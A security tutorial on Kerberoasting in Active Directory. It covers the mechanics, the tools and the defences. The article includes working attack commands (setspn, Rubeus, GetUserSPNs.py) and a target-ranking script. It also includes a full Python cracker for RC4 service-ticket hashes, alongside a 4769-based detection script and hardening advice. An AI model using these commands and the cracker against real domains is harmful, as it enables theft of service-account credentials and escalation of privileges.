1. Introduction
Kerberoasting has emerged as one of the most prevalent and effective credential-cracking techniques used by attackers to escalate privileges in enterprise environments. It does not exploit a flaw in the Kerberos protocol itself; it abuses a design property: service tickets are encrypted with a key derived from the service account's password, so any authenticated domain user can request a ticket and crack it offline to recover that password. This article provides a comprehensive, step-by-step exploration of Kerberoasting, its underlying mechanisms, and actionable strategies to detect and prevent such attacks. Whether you are a security professional, IT administrator, or simply seeking to enhance your knowledge of password-cracking threats, this guide will equip you with the insights needed to defend against Kerberoasting.
2. Understanding Kerberos Authentication
To fully grasp Kerberoasting, it is essential to understand how Kerberos authentication operates within enterprise networks, particularly in Microsoft Active Directory environments.
2.1 What is Kerberos?
Kerberos is a network authentication protocol designed to provide secure authentication for client-server applications. Developed at MIT in the 1980s, Kerberos is widely used in modern enterprise networks, especially those leveraging Active Directory. Its core objective is to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner, using secret-key cryptography.
Kerberos is recognized for its efficiency and security, but as with any protocol, it is not immune to exploitation. For a technical overview, see the MIT Kerberos Project.
2.2 Key Components of Kerberos
The Kerberos protocol relies on several key components:
- Key Distribution Center (KDC): The trusted authority that issues tickets and authenticates users. It comprises two main services:
- Authentication Service (AS): Verifies user identity and issues Ticket Granting Tickets (TGTs).
- Ticket Granting Service (TGS): Issues service tickets for access to specific network resources.
- Client: The user or system requesting access to a service.
- Service: The application or resource the client wants to access (e.g., file server, database).
- Service Principal Name (SPN): A unique identifier for a service instance (for example MSSQLSvc/db01.corp.local:1433), registered on the user or computer account the service runs as. The KDC uses the SPN to look up that account's key when it encrypts a service ticket.
2.3 Service Tickets and Their Role
When a user wants to access a network service, Kerberos issues a service ticket (TGS ticket). Its encrypted part is protected with the service account's long-term key, which is derived from the account's password (the NT hash for RC4, a PBKDF2-derived key for AES). Only the service holding that key can decrypt and validate the ticket, which is what lets the service trust a ticket without contacting the KDC. The same property is what enables Kerberoasting: anyone holding a ticket holds ciphertext whose key is a function of the service account's password, and can test password guesses against it offline.
For a detailed explanation of Kerberos tickets, refer to Microsoft's Kerberos Authentication Overview.
3. What is Kerberoasting?
3.1 Definition and Overview
Kerberoasting is a post-exploitation attack technique that targets service accounts in Active Directory environments. Using any authenticated domain account, the attacker requests service tickets for accounts that have Service Principal Names (SPNs), extracts the encrypted portion of each ticket, and attempts to crack it offline. If successful, the attacker recovers the plaintext password of the service account, which frequently holds elevated privileges, enabling lateral movement or privilege escalation.
The technique was first publicized by Tim Medin, a SANS instructor, in his 2014 DerbyCon talk "Attacking Kerberos: Kicking the Guard Dog of Hades", and has since become a staple of both penetration testing and real-world attacks.
3.2 How Kerberoasting Works
Kerberoasting exploits the way Kerberos issues service tickets. When a user requests access to a service, the KDC encrypts the ticket with a key derived from the service account's password (its NT hash for RC4, a PBKDF2-derived key for AES). Any account with valid domain credentials can request such a ticket for any SPN. The encrypted ticket arrives in the TGS-REP, and current tools parse it straight out of that reply (the original technique exported it from LSASS memory with Mimikatz after requesting it through .NET). The attacker then guesses passwords offline, deriving a key from each guess and testing whether it decrypts the ticket.
Because the cracking happens offline, it is not limited by account lockout policies or by detection that watches failed logons. The ticket request itself is still logged on the domain controller (Event ID 4769), however, and the cost of cracking depends heavily on the encryption type: RC4 (etype 23) tickets can be tested at a rate orders of magnitude higher than AES tickets, whose keys are derived with 4,096 rounds of PBKDF2.
3.3 Why Attackers Target Service Tickets
Service accounts often have elevated privileges and, in many organizations, use passwords that were chosen by a person years ago and never rotated, because changing them risks breaking the service. By targeting these accounts, attackers can:
- Obtain credentials for high-privilege accounts.
- Move laterally within the network.
- Escalate privileges to domain administrator.
The combination of high value and often weak protection makes service tickets a prime target for Kerberoasting attacks.
4. Step-by-Step: The Kerberoasting Attack Process
Understanding the Kerberoasting process step-by-step is crucial for both defenders and penetration testers. Below, we break down each phase of the attack.
4.1 Reconnaissance: Identifying Service Accounts
The first step in a Kerberoasting attack is to identify accounts with registered Service Principal Names (SPNs). These accounts are typically associated with services like SQL Server, IIS, or custom applications.
Attackers use tools or native commands to enumerate SPNs in the domain. For example:
setspn -T DOMAIN -Q */*
This command lists every SPN in the domain (the -T switch names the domain to query; -Q */* matches any service class on any host). The output includes computer accounts, whose passwords are long, random, and rotated automatically, so attackers filter the list down to user objects, which are the accounts with human-chosen passwords worth cracking.
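The filtering described above, as an added example in Python (not code from the article, nor from setspn, PowerView or Impacket): the LDAP filter that GetUserSPNs.py-style tools send, followed by the attribute-based triage a tester does by hand on the result. The directory entries are constructed; the attribute names and the userAccountControl and msDS-SupportedEncryptionTypes bit values are the real Active Directory ones. The scoring also folds in the encryption-type and password-age checks this article returns to in its hardening sections, because those are what decide whether a cracking run is worth starting.

```python
"""Pick Kerberoasting targets from SPN enumeration results.

Added example; not from the article or from setspn/PowerView/Impacket. The
entries below are constructed, but the attribute names are the real Active
Directory ones, and the filter is the one GetUserSPNs.py-style tools send.
"""
from datetime import datetime, timezone

# LDAP filter: enabled user objects with at least one SPN, krbtgt excluded.
# (The OID is the LDAP_MATCHING_RULE_BIT_AND extensible match on userAccountControl.)
ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(sAMAccountName=krbtgt)))"
)

UAC_ACCOUNTDISABLE = 0x0002
# msDS-SupportedEncryptionTypes bits the KDC consults when choosing the ticket etype
ETYPE_RC4_HMAC = 0x04
ETYPE_AES128 = 0x08
ETYPE_AES256 = 0x10


def _entry(name, spns, uac=0x10200, etypes=0, admin=0,
           pwd_set=datetime(2019, 1, 1, tzinfo=timezone.utc)):
    return {"sAMAccountName": name, "servicePrincipalName": spns, "userAccountControl": uac,
            "msDS-SupportedEncryptionTypes": etypes, "adminCount": admin, "pwdLastSet": pwd_set}


# Constructed sample of what setspn -Q */* or the LDAP query returns (not real data).
SAMPLE_ENTRIES = [
    _entry("svc_sql", ["MSSQLSvc/db01.corp.local:1433"], admin=1,
           pwd_set=datetime(2016, 3, 1, tzinfo=timezone.utc)),
    _entry("svc_web", ["HTTP/intranet.corp.local"], etypes=ETYPE_AES128 | ETYPE_AES256,
           pwd_set=datetime(2025, 1, 10, tzinfo=timezone.utc)),
    _entry("svc_old", ["CIFS/legacy.corp.local"], uac=0x10200 | UAC_ACCOUNTDISABLE),
    _entry("DB01$", ["HOST/db01.corp.local", "MSSQLSvc/db01.corp.local"], etypes=ETYPE_AES256),
    _entry("krbtgt", ["kadmin/changepw"], etypes=ETYPE_AES256),
]


def is_roastable(e):
    """Mirror the LDAP filter, plus drop computer accounts: their passwords are
    long, random and rotated automatically, so cracking them is hopeless."""
    name = e["sAMAccountName"]
    if name.endswith("$") or name.lower() == "krbtgt":
        return False
    if not e.get("servicePrincipalName"):
        return False
    return not e["userAccountControl"] & UAC_ACCOUNTDISABLE


def score(e, now):
    """Higher is a better target. Assumption: an unset/zero
    msDS-SupportedEncryptionTypes means the DC will still issue RC4 tickets."""
    etypes = e.get("msDS-SupportedEncryptionTypes") or 0
    s = 3 if (etypes == 0 or etypes & ETYPE_RC4_HMAC) else 0  # RC4 cracks orders of magnitude faster than AES
    s += 2 if e.get("adminCount") == 1 else 0                   # privileged account
    s += 1 if (now - e["pwdLastSet"]).days > 365 else 0         # old, probably human-chosen password
    return s


def rank_targets(entries, now=None):
    """Roastable entries, best target first."""
    now = now or datetime.now(timezone.utc)
    return sorted((e for e in entries if is_roastable(e)), key=lambda e: score(e, now), reverse=True)


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    for e in rank_targets(SAMPLE_ENTRIES):
        print(score(e, now), e["sAMAccountName"], e["servicePrincipalName"])
```

On the constructed sample the disabled account, the computer account and krbtgt drop out, and svc_sql (RC4-capable, adminCount=1, password last set in 2016) outranks svc_web (AES-only, recently rotated). Defenders can run the same scoring against their own directory to see what an attacker will go after first.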
4.2 Requesting Service Tickets
Once SPNs are identified, the attacker uses valid domain credentials to request service tickets for these accounts. This is a legitimate operation: any authenticated user can request a service ticket for any SPN in the domain, whether or not the service would ever authorize them, so a single request is indistinguishable from normal traffic unless its volume or encryption type is examined.
The KDC responds with a service ticket encrypted under the service account's long-term key. The encryption type is negotiated from what the client offers and what the account supports (msDS-SupportedEncryptionTypes), and attack tools ask for RC4 wherever the account allows it, because RC4 tickets crack far faster than AES ones.
4.3 Extracting Ticket Granting Service (TGS) Tickets
The attacker extracts the encrypted part of each ticket from the TGS-REP (or, with older tooling, from LSASS memory). Rubeus and Impacket do this in the same step as the request and write the result in hashcat or John format, for example $krb5tgs$23$*user$REALM$spn*$... for RC4 tickets.
The extracted blob is the ticket's ciphertext plus its integrity checksum. A password guess is correct when the key derived from it decrypts the blob and the checksum verifies, so the blob functions as a hash of the service account's password.
4.4 Cracking Service Account Passwords
The attacker then runs offline dictionary, rule-based, or brute-force attacks against the extracted tickets with hashcat (mode 13100 for RC4/etype 23, 19600 and 19700 for AES128 and AES256) or John the Ripper. A service account with a human-chosen password can often be cracked in minutes or hours; a 25-character random password will not be.
With the plaintext password, the attacker can authenticate as the service account and inherit whatever access it has, which is frequently local administrator on the hosts it serves and sometimes Domain Admin. For a deeper dive into these techniques and the latest advancements, check out the Password Cracking Guide 2025: 5 Latest Techniques.
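The cracking step above, together with the ticket encryption from sections 2.3 and 3.2 that makes it possible, worked end to end for RC4-HMAC (etype 23) in Python. This is an added example, not code from the article or from Rubeus, Impacket or hashcat; it reproduces what hashcat mode 13100 operates on: the NT hash as the key, the RFC 4757 key schedule for key usage 2 (the TGS-REP ticket), and the checksum-plus-ciphertext blob in the $krb5tgs$23$ line format. The ticket body, confounder, account names and wordlist are constructed; MD4 is implemented by hand because Python builds on OpenSSL 3 often have no md4 in hashlib.

```python
"""Why a service ticket is an offline-crackable hash: RC4-HMAC (etype 23) end to end.

Added example; not code from this article or from Rubeus, Impacket or hashcat.
It reproduces what hashcat mode 13100 works with: the NT hash as the key, the
RFC 4757 key schedule for key usage 2 (the TGS-REP ticket), and the
checksum||ciphertext blob. The ticket body is a constructed stand-in for the
real ASN.1 EncTicketPart. MD4 is hand-rolled because Python builds on
OpenSSL 3 often lack hashlib's md4.
"""
import hashlib
import hmac
import struct

KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage for the ticket's enc-part


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = [(v + w) & 0xFFFFFFFF for v, w in zip((a, b, c, d), (aa, bb, cc, dd))]
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes) -> bytes:
    """KDC side (RFC 4757): returns checksum(16) || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    edata = confounder + plaintext
    checksum = hmac_md5(k1, edata)
    return checksum + rc4(hmac_md5(k1, checksum), edata)


def rc4_hmac_key_matches(key: bytes, usage: int, blob: bytes) -> bool:
    """Cracker side: one guess costs one MD4, three HMAC-MD5s and one RC4 pass."""
    checksum, ciphertext = blob[:16], blob[16:]
    k1 = hmac_md5(key, struct.pack("<I", usage))
    edata = rc4(hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(hmac_md5(k1, edata), checksum)


def to_hashcat_13100(user: str, realm: str, spn: str, blob: bytes) -> str:
    """Layout Rubeus and GetUserSPNs.py emit for etype 23."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_13100(line: str, wordlist) -> "str | None":
    """Offline dictionary attack on one $krb5tgs$23$ line; no DC is contacted."""
    checksum_hex, edata_hex = line.split("*$", 1)[1].split("$")
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for guess in wordlist:
        if rc4_hmac_key_matches(nt_hash(guess), KEY_USAGE_TGS_REP_TICKET, blob):
            return guess
    return None


def demo():
    """Constructed ticket for a weak service-account password, then crack it."""
    password = "Summer2016!"  # assumed weak password, chosen for the demo
    body = b"stand-in for EncTicketPart: session key, PAC, validity times"
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TGS_REP_TICKET, b"\x11" * 8, body)
    line = to_hashcat_13100("svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433", blob)
    return line, crack_13100(line, ["password", "Winter2015!", "Summer2016!", "P@ssw0rd"])


if __name__ == "__main__":
    line, found = demo()
    print(line[:70] + "...")
    print("cracked:", found)
```

The point to take from it: the KDC never reveals the service account's key, yet every guess can be checked with a handful of MD4/HMAC-MD5/RC4 operations, which is why hashcat reaches hundreds of millions of guesses per second on this format. An AES ticket replaces the NT-hash step with 4,096 PBKDF2 iterations per guess, which is the whole reason the hardening advice below insists on AES-only service accounts.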
5. Tools Commonly Used for Kerberoasting
Several open-source tools have been developed to automate the Kerberoasting attack process. Understanding these tools is essential for both red and blue teams.
5.1 PowerView
PowerView is a PowerShell toolset for network situational awareness in Windows domains. It allows attackers and penetration testers to enumerate SPNs, identify service accounts, and gather domain information.
Example command to find Kerberoastable accounts (Get-NetUser is the older name; current PowerView builds call it Get-DomainUser, and Invoke-Kerberoast combines enumeration, ticket requests and hash formatting in one step):
Get-NetUser -SPN
For more information, see the PowerSploit GitHub repository.
5.2 Rubeus
Rubeus is a powerful C# tool for Kerberos abuse, including ticket extraction and Kerberoasting. It can request service tickets, extract them, and format them for cracking.
Sample usage (writes hashcat-formatted lines for every roastable account; /rc4opsec limits requests to accounts without AES, which keeps the tool from producing RC4 requests for AES-capable accounts that stand out in the logs):
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
See the Rubeus GitHub repository for documentation and usage examples.
5.3 Impacket
Impacket is a Python library for working with network protocols, including Kerberos. Its GetUserSPNs.py script (installed as impacket-GetUserSPNs by some distributions) queries LDAP for user accounts with SPNs and, with -request, asks the KDC for a ticket for each and prints the hashes in hashcat/John format; without -request it only enumerates.
Example command:
GetUserSPNs.py domain/user:password -dc-ip <dc-ip> -request -outputfile hashes.txt
For more details, visit the Impacket GitHub repository.
6. Detecting and Preventing Kerberoasting Attacks
Defending against Kerberoasting requires a combination of monitoring, hardening, and proactive security policies. Below are key strategies to detect and mitigate these attacks.
6.1 Monitoring for Suspicious Ticket Requests
Monitor domain controllers for unusual volumes of service ticket requests, especially from ordinary user accounts. Key indicators include:
- Many requests for different SPNs from the same account within a short window (a minute or two), where a normal user touches a handful of services per day.
- Requests for tickets associated with high-privilege accounts, or for services the requesting user never otherwise uses.
- Requests with RC4 encryption (TicketEncryptionType 0x17) in a domain whose accounts support AES, since RC4 is the type attack tools prefer.
Enable and analyze Windows security event logs, particularly Event ID 4769 (A Kerberos service ticket was requested), which requires the Audit Kerberos Service Ticket Operations subcategory. 4769 is among the noisiest events a domain controller produces, so filter out requests for krbtgt and for computer accounts (service names ending in $), drop failures (Status other than 0x0), and alert on the count of distinct SPNs per requester rather than on single events. A honeypot account that has an SPN but no real service behind it is a cheap, high-fidelity signal: nothing legitimate ever requests a ticket for it. SIEM solutions can help correlate and alert on this activity. For guidance, see CISA's Kerberoasting Detection and Mitigation.
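The 4769-based rule above as an added example in Python (not code from the article or from CISA): it applies the krbtgt, computer-account and status filters, keeps RC4 requests, and alerts when one requester touches at least THRESHOLD distinct service accounts inside WINDOW. The events are constructed; the field names are the ones in the 4769 event XML (TargetUserName, ServiceName, TicketEncryptionType, TicketOptions, Status, IpAddress). The threshold, the window and the RC4-only default are assumptions to tune against a baseline of your own logs.

```python
"""Kerberoasting detection over Event ID 4769 records.

Added example; not from the article or CISA. Field names match the 4769
event XML. The events below are constructed, not real log data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                 # TicketEncryptionType attack tools ask for
THRESHOLD = 5                     # distinct SPN accounts per requester...
WINDOW = timedelta(minutes=5)     # ...inside this window (assumption: tune to baseline)


def _ev(t_sec, user, svc, etype, status="0x0", ip="10.0.0.25"):
    """Build one constructed 4769 record (all within 09:00 on one day)."""
    return {"time": datetime(2025, 1, 15, 9, 0, t_sec), "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype,
            "TicketOptions": "0x40810000", "Status": status, "IpAddress": ip}


SAMPLE_EVENTS = [
    _ev(0, "alice@CORP.LOCAL", "FS01$", "0x12", ip="10.0.0.40"),      # normal AES file-server access
    _ev(3, "alice@CORP.LOCAL", "svc_web", "0x12", ip="10.0.0.40"),    # normal AES web access
    _ev(10, "jdoe@CORP.LOCAL", "krbtgt", "0x12"),                     # TGT renewal, always noise
    *[_ev(11 + i, "jdoe@CORP.LOCAL", s, RC4_HMAC) for i, s in enumerate(
        ["svc_sql", "svc_web", "svc_backup", "svc_sharepoint", "svc_exchange", "svc_legacy"])],
    _ev(30, "jdoe@CORP.LOCAL", "svc_sql", RC4_HMAC, status="0xe"),    # failed request, no ticket issued
]


def is_roast_candidate(ev, require_rc4=True):
    """Keep only successful service-ticket requests for user-type service accounts."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":   # computer accounts / TGT traffic
        return False
    if ev["Status"] != "0x0":                           # failures carry no ticket to crack
        return False
    # RC4 is the high-signal case; pass require_rc4=False to also catch AES roasting,
    # at the price of more noise from ordinary AES service access.
    return ev["TicketEncryptionType"] == RC4_HMAC or not require_rc4


def detect(events, require_rc4=True):
    """Return one alert per (requester, source IP) that hit >= THRESHOLD distinct
    services within WINDOW: (user, ip, sorted service names, window start)."""
    per_requester = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_roast_candidate(ev, require_rc4):
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    alerts = []
    for (user, ip), evs in per_requester.items():
        for i, start in enumerate(evs):                 # sliding window over this requester
            in_window = [e for e in evs[i:] if e["time"] - start["time"] <= WINDOW]
            services = {e["ServiceName"] for e in in_window}
            if len(services) >= THRESHOLD:
                alerts.append((user, ip, sorted(services), start["time"]))
                break                                   # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for user, ip, services, when in detect(SAMPLE_EVENTS):
        print(f"{when:%H:%M:%S} {user} from {ip} requested RC4 tickets for {len(services)} SPNs: {services}")
```

Alice's AES tickets and jdoe's krbtgt and failed requests are dropped; jdoe's six RC4 tickets for six different service accounts inside a few seconds produce one alert. In a real SIEM the same logic is a count-distinct of ServiceName grouped by TargetUserName and IpAddress over a time bucket, and the honeypot SPN mentioned above is simply a ServiceName that alerts on a single hit.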
6.2 Service Account Hardening
Reduce the attack surface by minimizing the number of service accounts and ensuring they have only the necessary privileges. Where possible:
- Use Group Managed Service Accounts (gMSA) so the password is long, random, and rotated by the domain controllers every 30 days by default; a gMSA ticket can still be requested, but it is not crackable in practice.
- Set msDS-SupportedEncryptionTypes on service accounts to AES only (0x18) so the KDC never issues RC4 tickets for them, and test each service before enforcing this, because legacy software may still negotiate RC4.
- Restrict service accounts from interactive logon and keep them out of privileged groups; an SPN on a Domain Admin account is the worst case.
- Regularly review and remove unnecessary SPNs.
For best practices, refer to CIS Controls v8.
6.3 Implementing Strong Password Policies
Since Kerberoasting relies on cracking weak passwords, enforcing strong password policies is critical. Recommendations include:
- Require long, randomly generated passwords (25 characters or more) for every service account that cannot be a gMSA; complexity rules alone do not stop dictionary and rule-based attacks on human-chosen passwords.
- Change service account passwords regularly, so that a ticket captured today is not still crackable next year; a fine-grained password policy can enforce this for service accounts without affecting ordinary users.
- Monitor for password reuse across accounts, since a cracked service account password is often shared with an administrator account.
See NIST SP 800-63B for password policy standards. For additional guidance on establishing robust password requirements and policy management, review the resource on Password Policy Best Practices 2025.
6.4 Auditing and Network Segmentation
Regularly audit service accounts, SPNs, and ticket requests. Implement network segmentation to limit lateral movement if a service account is compromised. Additional measures include:
- Restricting administrative access to sensitive systems.
- Isolating high-value assets in separate network segments.
- Implementing Just-In-Time (JIT) and Just-Enough-Administration (JEA) principles.
For more on segmentation, see CrowdStrike's Network Segmentation Guide.
7. Real-World Examples and Case Studies
Kerberoasting has been observed in numerous real-world attacks, often as part of a broader campaign targeting enterprise networks.
- APT Attacks: Advanced Persistent Threat (APT) groups have leveraged Kerberoasting to escalate privileges after initial compromise. For example, Unit 42 documented Kerberoasting in targeted attacks against financial institutions.
- Ransomware Campaigns: Ransomware operators have used Kerberoasting to gain domain admin access, enabling widespread deployment of ransomware payloads. See BleepingComputer for recent trends.
- Penetration Testing: Kerberoasting is a standard technique in red team engagements. Reports from Rapid7 highlight how quickly weak service account passwords can be cracked in real-world environments.
These examples underscore the importance of proactive defense against Kerberoasting. For further insight into how password recovery and cracking works in practice, explore How password recovering works at Online Hash Crack.
8. Ethical Considerations and Legal Implications
While understanding Kerberoasting is vital for defense, it is important to recognize the ethical and legal boundaries surrounding its use.
- Penetration Testing: Only perform Kerberoasting in environments where you have explicit authorization. Unauthorized use is illegal and can result in criminal charges.
- Responsible Disclosure: If you discover vulnerable service accounts, report them through proper channels.
- Compliance: Ensure all security testing aligns with organizational policies and relevant regulations (e.g., GDPR, HIPAA).
For more on ethical hacking, see ISACA's Ethical Hacking Guidance. For structured guidance on legal password testing, see Legal Password Testing: Stay Compliant in 2025.
9. Conclusion
Kerberoasting represents a significant threat to organizations relying on Kerberos authentication. By understanding how attackers exploit service tickets and implementing robust detection and prevention strategies, defenders can greatly reduce the risk of credential compromise. Regular auditing, strong password policies, and vigilant monitoring are essential components of a comprehensive defense against password-recovery attacks like Kerberoasting.
Stay informed, stay vigilant, and prioritize the security of your service accounts to protect your enterprise from evolving threats.
10. Further Reading and Resources
- MITRE ATT&CK: Kerberoasting
- SANS: Kerberoasting Explained
- CISA: Kerberoasting Detection and Mitigation
- Microsoft: Kerberos Authentication Overview
- CIS Controls v8
- BleepingComputer: Kerberoasting in Ransomware Campaigns
- Rubeus GitHub Repository
- Impacket GitHub Repository
- PowerView GitHub Repository
- CrowdStrike: Network Segmentation
- NIST SP 800-63B: Digital Identity Guidelines
- ISACA: Ethical Hacking Legal and Ethical Considerations
- Password Cracking Guide 2025: 5 Latest Techniques
- Password Policy Best Practices 2025
- How password recovering works at Online Hash Crack
- Legal Password Testing: Stay Compliant in 2025